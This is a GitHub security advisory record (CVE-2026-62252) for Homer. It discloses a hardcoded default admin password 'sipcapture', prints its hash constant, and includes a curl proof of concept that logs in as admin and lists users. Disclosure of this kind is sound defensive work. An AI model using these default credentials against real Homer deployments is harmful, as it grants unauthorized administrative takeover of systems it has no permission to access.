{"id":"GHSA-6xp5-7rcx-xfgx","summary":"Homer: Hardcoded Default Admin Password 'sipcapture' With No Forced Change on First Login","details":"### Summary\nOn every fresh Homer deployment using internal authentication, the bootstrap process automatically creates an `admin` account with the password `sipcapture` (stored as a legacy SHA-256 hex hash). There is no first-login forced-change mechanism. Any attacker who reaches the login endpoint immediately gains full administrative access.\n\n### Details\n**`config/config.go` lines 858-861:**\n```go\n// DefaultInternalAuthPasswordHash is the SHA-256 hex digest of the default\n// bootstrap password (cleartext: sipcapture).\nconst DefaultInternalAuthPasswordHash = \"883ffc1f37fd0fe542b0fb9740035c4383e7d976c411161d24e62edace280f90\"\n```\n\n**`coordinator/services/auth_bootstrap.go` lines 20-71:** `EnsureBootstrapAdminUser()` runs at startup. If no admin user exists, it inserts a row with `username=admin`, `password_hash=DefaultInternalAuthPasswordHash`. No `force_change`, no `first_login` flag, no expiry is set.\n\n**`coordinator/services/auth_bootstrap_test.go` line 114** confirms the plaintext:\n```go\nu, err := svc.Authenticate(ctx, \"admin\", \"sipcapture\")\n```\n\n**`passwordhash/password.go` lines 36-45:** Legacy SHA-256 hex hashes are accepted via `legacySHA256HexEqual`, so the default credential is functional on any deployment.\n\n### PoC\n```bash\n# Authenticate with default credentials — works on any fresh Homer deployment\ncurl -s -X POST http://\u003chomer-host\u003e/api/v3/auth \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"username\":\"admin\",\"password\":\"sipcapture\"}'\n# Response: {\"token\":\"\u003cadmin-jwt\u003e\",\"data\":{\"userGroup\":\"admin\"}}\n\n# Use the token to access all admin functionality\ncurl -H \"Authorization: Bearer \u003cadmin-jwt\u003e\" http://\u003chomer-host\u003e/api/v3/users\n```\n\n### Impact\nUse of Hard-coded Credentials (CWE-798). Any attacker who can reach a freshly deployed Homer instance gains immediate full administrative access using the publicly documented default password, with no lockout, rate limiting, or forced password change required.\n\n### Fix\nRemove the hardcoded `DefaultInternalAuthPasswordHash` constant. Require operators to provide a hashed admin password in the configuration file. Alternatively, generate a random password on first startup, print it to stdout once, and immediately force a change on first login.\n\nIf possible, please apply for a CVE number when posting.","aliases":["CVE-2026-62252"],"modified":"2026-10-07T16:30:05.488348949Z","published":"2026-10-07T16:12:02Z","database_specific":{"cwe_ids":["CWE-798"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-10-07T16:12:02Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/sipcapture/homer/security/advisories/GHSA-6xp5-7rcx-xfgx"},{"type":"WEB","url":"https://github.com/sipcapture/homer/pull/838"},{"type":"WEB","url":"https://github.com/sipcapture/homer/commit/b2e942031ff8cd7435a244ebef306ee97d16b809"},{"type":"PACKAGE","url":"https://github.com/sipcapture/homer"},{"type":"WEB","url":"https://github.com/sipcapture/homer/releases/tag/11.0.283"}],"affected":[{"package":{"name":"github.com/sipcapture/homer-app","ecosystem":"Go","purl":"pkg:golang/github.com/sipcapture/homer-app"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.0.0-20260625091610-b2e942031ff8"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-6xp5-7rcx-xfgx/GHSA-6xp5-7rcx-xfgx.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}